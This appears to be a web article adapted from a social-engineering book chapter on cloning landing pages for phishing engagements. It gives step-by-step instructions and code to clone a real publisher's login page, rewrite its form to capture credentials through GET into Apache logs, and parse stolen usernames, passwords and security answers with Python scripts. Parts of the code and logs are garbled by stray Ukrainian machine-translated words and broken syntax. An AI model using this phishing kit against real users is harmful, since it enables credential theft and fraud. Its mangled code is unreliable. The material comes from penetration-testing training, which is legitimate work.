Landing page cloning is a dangerous and illegal activity used for fraud, phishing and theft of confidential information. Illegally impersonating the look and feel of legitimate web pages can mislead users in an attempt to abuse their trust and obtain sensitive data such as passwords, financial details, etc. Willing fraudsters can use cloned pages to appear authentic and trustworthy in order to trick users into entering their personal information. This can be done by creating an almost exact copy of the original page that masquerades as a trusted website to confuse and deceive innocent users. Victims who click on a link in your phishing email should be taken to a legitimate web page. If your attack reaches this stage, creating a useful and realistic landing page becomes the most important aspect of the engagement.
Depending on the level of complexity requested by the client, this can vary from HTML at the level of a free site builder to an almost identical clone of the site an employee visits every day. In this section, we’ll take a look at the cloned website to show what changes you’ll need to make to the original site. We then clone two web pages from the No Starch Press website using HTTrack, a Linux command-line tool. You can host these cloned pages on the Apache server you set up in Chapter 7, and then link to this site in an email sent to your client’s employees.
Let’s take a look at a fake SurveyMonkey site I cloned around 2017. This simple site consists of three pages. First, it prompts victims to fill out a login form. When they click the Submit button, they are taken to a password reset form that asks a few simple questions. On the last page, the user is informed that an error occurred while resetting the account. Let’s take a closer look at these pages to better understand their structure.
Figure 8.1 shows the first page named index.html.
An attentive victim may have noticed several signs that can detect phishing. Note that there is no green lock icon in the address bar to indicate that HTTPS is being used because I opened the page directly from the file in my browser without using Apache. In the case of true phishing, the URL will not be in the legal format of surveymonkey.com/<survey path>, although SurveyMonkey may be mentioned somewhere to trick users. Additionally, SurveyMonkey typically does not include logos on the login page. Otherwise, it is difficult to detect this phishing; the correct address is displayed in the browser tab and hovering over the Sign Up or BBB Accredited Business links will display the actual addresses.
8.2 shows the first page (index.html) of our site, to which we connected via the HTTPS protocol without errors. This is the start page where we send victims and where we will try to collect victims’ email addresses and passwords before submitting them to questions.html
If you look at the source HTML code of this page, you will see that it is almost identical to the code of the original site. You can find the source code for the pages we cloned, as well as parsers written in Python for typeable information, at http://sm-phish.seosint.xyz/.
In the index, I changed the lines of code.html that define the login form and its fields, and edited the code so that when users submit the form, they are redirected to questions.html:
<form id="sign_in_form" class="sign-in-form" action="Questions.html" enctype="application/ xwww-form-urlencoded" "method=get"> <fieldset form="sign_in_form"> <label for="username">Enter your username:</label> <input id="username" name="username" value="" autocorrect="off" autocapitalize="off" class="notranslate textfield required" maxlength="50" size="20" autofocus="" type="text"> <span></span> <label for="password">Enter your password:</label> <input id="password" name="password" class="notranslate textfield required" size="20" autocomplete="off" type="password"> <span></span> <div> <input id="remember_me" name="remember_me" type="checkbox"> <label class="remember-me" for="remember_me">Remember me!</label> </div> <a href="Questions.html"> <button class="translate btn btn-large btn-arrow btn-arrow-right btn-arrow-large-horiz btnarrow-large-right-dark yellow shadow" type="submit">Sign In <span></span></button></a>
I defined an action parameter to tell the system to go to the question.html page after the user submits the form. Then defined the HTTP method as get to collect data from each form field. (A full explanation of HTTP methods is beyond the scope of this book, but you can find many resources covering this topic on the Internet.) I then created the input-id , textfield required , and type fields that would be displayed on the victim’s screen.
You should understand that HTTP GET is not a secure method. To prevent an attacker from outside the client’s network from taking advantage of the data entered on your page, ensure that a firewall is installed and that only your IP addresses and client addresses are allowed.
However, there are several advantages to using the HTTP GET method to write input data. This tactic does not require an internal database as the data is stored directly in the Apache log file located at /var/log/apache2/access.log. Additionally, if the target organization monitors its network traffic, it should be notified when parameters such as password=userdata are transmitted from the page in clear text, letting the organization know that it is under attack.
Transmitting credentials in plain text in URLs or other insecure channels is a security breach. Some platforms encode this text, which is also unsafe; Even if the code uses a hash as a parameter, an attacker with the ability to intercept this traffic can perform a hash interception attack, in which he steals the cryptographic representation of the password (the hash) and uses it directly to gain access to resources without knowing the password.
Although this form looks like a user account login, it is not. It just captures the input and doesn’t check anything. As long as each field contains at least one character, the user will be taken to the next page. If this code is actually authenticated, it will be considered insecure because the website will let everyone in.
Attackers can use collected passwords in a variety of attacks. For example, they can spray the password by trying to use it to log into other accounts associated with the employee and the target organization.
In fig. Figure 8.3 shows a second page that asks users for sensitive information under the guise of restoring their account.
The questions.html page uses the same source code as index.html. Here, I’ve replaced the email addresses and password form fields with four password reset questions. I also replaced the field that prompts users to request.html with error.html.
The last page (Figure 8.4) informs users of the error.
You can use this last page for various purposes. For example, many victims may wonder why the error occurred and try to enter different credentials in an attempt to get the login page to work. Victims can also report this issue to the IT department, which will surely put an end to the attack.
This page’s HTML code contains an infinite loop that causes it to keep reloading. When I wrote this code around 2017, browsers allowed this loop to run forever. Browser versions released after 2020 may stop it after some time.
The cycle causes the problem. Each iteration writes a line to the log file, making it difficult to manually collect passwords and other sensitive information from the file. Instead, you can use a couple of Python scripts to extract just the information you need. You can find these scripts at http://sm-phish. seosint.xyz
In the logs, the raw information for the login transaction contains the following data:
IP Address - - [17/Feb/2021:04:04:12 +0000] "GET /Questions.html?username= Testing_Username&password=password123 HTTP/1.1" 200 11590 "https://IP Address/ Index.html" "Mozilla/5.0 (user agent information) user agent information) (KHTML, like Gecko) user agent information) " IP Address - - [17/Feb/2021:04:04:36 +0000] "GET /Error.html?pet=Dee-Oh-Gee&school= Hogwarts&name=Mom&honeymoon=Tatooine HTTP/1.1" 200 12090 "https://IP Address/ Questions.html?username=Testing_Username&password=password123" "Mozilla/5.0 (user agent information) user agent information) (KHTML, like Gecko) user agent information) "
Each line contains information submitted by the user. It tells us the page where the data was entered (question.html or error.html) and the field ID and value, for example pet=Dee-Oh-Gee&.
The data_parser_index.py script will open the log file, find each field we prompted users to enter on the login page, and then output the field values as an array:
#!/usr/bin/env python3 import re user_pass = re.compile(r"\S.+ім'я користувача\=(? P<user_name>\S.+)\&(? P<password>\ S.+)\sHTTP\S.+") log = open("/var/log/apache2/access.log", "r") масив = []
for l in log:
u = user_pass.findall(l), якщо ви: Print(U) Else: Вихід
We import the Python regex module and then create a regular expression that will parse the username and password of each line that matches the criteria in the log file. After opening the log file, a for loop loops through each line of the file, displaying all matches.
The data_parser_questions.py script then performs the same tasks as before, except that it extracts the input data from the questions.html file:
#!/usr/bin/env python3 import re питання = re.compile(r"\S.+pet\=(? P<pet>\S.+)\&school\=(? P<school>\S.+)\ &name\=(? P<мати>\S.+)\&\медовий місяць\=(? P<honeymoon>\S.+)\sHTTP\S.+") log = open("/var/log/apache2/access.log", "r") масив = []
for l in log:
u = questions.findall(l), якщо ви: Print(U) Else: Вихід
After using the scripts to analyze the data, we should have the necessary information. The data_parser_index.py script gives you a username and password:
root@ossie:~# ./data_parser_index.py [(‘Testing_Username’, ‘password=password123’)]
The data_parser_questions.py script gives you password reset questions from the questions.html page:
root@ossie:~# ./data_parser_questions.py [(‘Dee-Oh-Gee’, ‘Hogwarts’, ‘Mam’, ‘Tatooine’)]
Website cloning
Now let’s clone the site. For this exercise, you will create a simple but almost identical copy of two No Starch Press web pages. The Apache instance created in the previous section needs code to display something on the user’s screen; Otherwise, you’re doing nothing but counting clicks.
Let’s say you’re going to attack a company whose employees you know from OSINT often buy No Starch Press books. To steal their login credentials, copy the nostarch.com login page. Visit this page now or find it using robots.txt, the file that tells internet search engine bots what to index and what not to index. We often use this file when collecting OSINT to identify directories that cannot be found using conventional search engines.
You may notice that when you click on the Login button, you are taken to a new web page: https://nostarch.com/user.Let’s clone both the main site page and the login page.
We will use the HTTrack website clone tool to clone the pages. This command line tool is already built into Kali, but you can install it on any Linux system. For example, use the following command to install it on Ubuntu and Debian:
The tool has several useful options. The –mirror option creates an almost identical copy of a specific site. The –update option updates a copy of an existing site, for example by making changes to the underlying code, links, trackers, or fields. The –continue option continues to display the site if the process has been interrupted or stopped. – the skeleton parameter copies only the HTML files of the site. The -O option allows you to specify the output directory.
The choice of cloning options depends on the complexity of the site you plan to clone, as well as the desired complexity of your phishing interaction. The larger and more complex the website, the longer it takes to clone, increasing the ability of the organization that owns the site to catch and block you. If the client doesn’t care how much noise you make, or you want a solid copy and have plenty of time to do it, do the full mirroring process. Otherwise, it is enough to download only the HTML code of the pages. Here we will use the last option. To clone the No Stanch login page, enter the following command: sudo httrack –skeleton https://nostarch.com/user/
Figure 8.5 shows the cloned page. You can view it from the directory from which you launched HTTrack. Navigate to the appropriate folder for your domain, and then navigate to the directory structure. In this case, you’re looking at index.html from nostarch.com.
Compare the clone with the original site (Figure 8.6). The only difference you should notice is the URL.
Now, any data entry on the page of the cloned site will redirect the user to the real site. You need to change this behavior for input fields.
First of all, let’s look at the code of the page. The easiest way is to load the actual site and identify the code input fields using your browser’s element checker. To do this, right-click anywhere on the page and select Check. Now hover over the input fields and the code on the right will highlight the relevant fragments.
In this case, we are studying the login form. Here is the form code from the original page:
<form id="sign_in_form" class="sign-in-form" action="Questions.html" enctype="application/xwww-form-urlencoded""method=post""method=get"> <fieldset form="sign_in_form"> <label for="username">Enter your username:</label> <input id="username" name="username" value="" autocorrect="off" autocapitalize="off" class="notranslate textfield required" maxlength="50" size="20" autofocus="" type="text"><span></span> <label for="password">Enter your password:</label> <input id="password" name="password" class="notranslate textfield required" size="20" autocomplete="off" type="password"> <span></span> <div> <input id="remember_me" name="remember_me" type="checkbox"> <label class="remember-me" for="remember_me">Remember me!</label> </div> <a href="Questions.html"><button class="translate btn btn-large btn-arrow btn-arrow-right btn-arrow-large-horiz btn-arrow-large-right-dark yellow shadow" type="submit">Sign In <span></span></button></a> </fieldset> </form>
Like the login form we discussed earlier, this file contains username and password fields, and data capture works the same way.
Upon further inspection, you can see that this site uses the HTTP POST method instead of GET, which means that this line will need to be rewritten so that you can steal the credentials in the URL, thus writing them to the Apache access log. HTTP POST and HTTP GET are methods of transferring information from the server to the client. The main difference is that the GET method passes parameters in a URL, which is less secure than the HTTP POST method, which uses the message body to pass parameters.
Let’s make some changes to the form code so that you can use the GET method and get the credentials as intended. The file you are looking for is in the nostarch.com/user directory in index.html. You can find the file using the element check method or by manually downloading and viewing the source code.
Here’s the part of the actual code that describes the form (you can find it using the form search):
<form action="https://nostarch.com/user/" method="post" id="user-login" acceptcharset="UTF-8"><div><div class="form-item form-item-openid-identifier form-type-textfield form-group""> <label class="control-label" for="edit-openid-identifier">Log in using OpenID</label> <input class="form-control form-text" type=”text" id="edit-openid-identifier" name="openid_identifier" value="" size="60" maxlength="255" /> <div class="help-block"><a href="https://openid.net/">What is OpenID?</a> </div></div><div class="form-item form-itemname form-type-textfield form-group"> <label class="control-label" for="edit-name">Username or email address <span class="form-required" title="This field is required.">*</span></label> <input class="form-control form-text required" title="Enter your username or email address." data-toggle="tooltip" type="text" id="edit-name" name="name" value="" size="60" maxlength="60" /> </div><div class="form-item form-item-pass form-type-password form-group"> <label class="control-label" for="edit-pass">Password <span class="form-required" title="This field is required.">*</span></label> <input class="form-control form-text required" title="Enter the password that accompanies your username." data-toggle="tooltip" type="password" id="edit-pass" name="pass" size="60" maxlength="128" /></div><input type="hidden" name="form_build_id" value="form--q4hdYsiZQz_R7O2aCls66if7f2BqLo2k1ZftdGkfs" /> <input type="hidden" name="form_id" value="user_login" /> <input type="hidden" name="openid.return_to" value="https://nostarch.com/openid/ authenticate?destination=user" /> <ul class="openid-links"><li class="openid-link"><a href="#openid-login">Log in using OpenID</a></li> <li class="user-link"><a href="#">Cancel OpenID login</a></li> </ul><div class="form-actions form-wrapper form-group" id="edit-actions"><button type="submit" id="edit-submit" name="op" value="Log in" class="btn btn-primary form-submit icon-before"><span class="icon glyphicon glyphicon-log-in" aria-hidden="true"></span> Log in</button> </div></div></form>
Now make the changes in bold:
<form action="Error.html" method="get" id="user-login" accept-charset="UTF-8"><div> <div class="form-item form-item-openid-identifier form-type-textfield form-group"> <label class="control-label" for="edit-openid-identifier">Log in using OpenID</label> <input class="form-control form-text" type="text" id="edit-openid-identifier" name="openid_identifier" value="" size="60" maxlength="255" /> <div class="help-block"”> <a href="Error.html">What is OpenID?</a></div> </div> <div class="form-item form-item-name form-type-textfield form-group"> <label class="control-label" for="edit-name">Username or email address <span class="formrequired" title="This field is required.">*</span></label> <input class="form-control form-text required" title="Enter your username or email address." data-toggle="tooltip" type="text" id="edit-name" name="name" value="" size="60" maxlength="60" /> </div> <div class="form-item form-item-pass form-type-password form-group"> <label class="control-label" for="edit-pass">Password <span class="form-required" title="This field is required.">*</span></label> <input class="form-control form-text required" title="Enter the password that accompanies your username." data-toggle="tooltip" type="password" id="edit-pass" name="pass" size="60" maxlength="128" /> </div><input type="hidden" name="form_build_id" value="form--q4hdYs-iZQz_ R7O2aCls66if7f2BqLo2k1ZftdGkfs" /> <input type="hidden" name="form_id" value="user_login" /> <input type="hidden" name="openid.return_to" value="Error.html"/> <ul class="openid-links"><li class="openid-link"><a href="#openid-login"> Log in using OpenID</a></li> <li class="user-link"><a href="#">Cancel OpenID login</a></li> </ul><div class="form-actions form-wrapper form-group" id="edit-actions"> <button type=”submit" id="edit-submit" name="op" value="Log in" class="btn btn-primary form-submit icon-before"> <span class="icon glyphicon glyphicon-log-in" aria-hidden="true"></span> Log in</button> </div></div></form>
First, you change the form action and the href tag, which allows you to redirect traffic from this page to your error.html page. Next you can see a piece of code, this needs to be removed so that your fake page doesn’t redirect the victim to the real page.
You’ll have to create your own version of the error.html page that the current page links to, but that’s easy. You can simply copy the existing file and replace the form with a message like the following:
<h5> Sorry, but our site is down for maintenance. Please check back in 24 hours. We apologize for any inconvenience.</h5>
You can find a sample error.html file for a SurveyMonkey page in the GitHub repository (http://sm-phish.seosint.xyz/).
Now test how the copy works by double-clicking the icon in the file browser or by navigating to the host in the browser (Figure 8.7).
After verifying that the fake page is working properly, move your site to the Apache root directory. This will install the SSL/TLS certificate and configure the DNS pointer. To do this, you will need to move each HTML file to the /var/www/public_html directory. Any connections to the site will be logged in Access.log, and that’s where you’ll collect data provided by victims.
Here is the Access content .log for the following event:
IP-адреса - - [17/лютий/2020:04:04:12 +0000] "GET /error.html?openid_ identifier=test&name=test&pass=test HTTP/1.1" 200 11590 "https://IP Address/index.html" "Mozilla/5.0 (інформація про агента користувача) інформація про агента користувача) (KHTML, як Gecko) інформація про агента користувача) "
We used materials from the book “Social Engineering and Ethical Hacking in Practice”, which was written by Joe Gray.
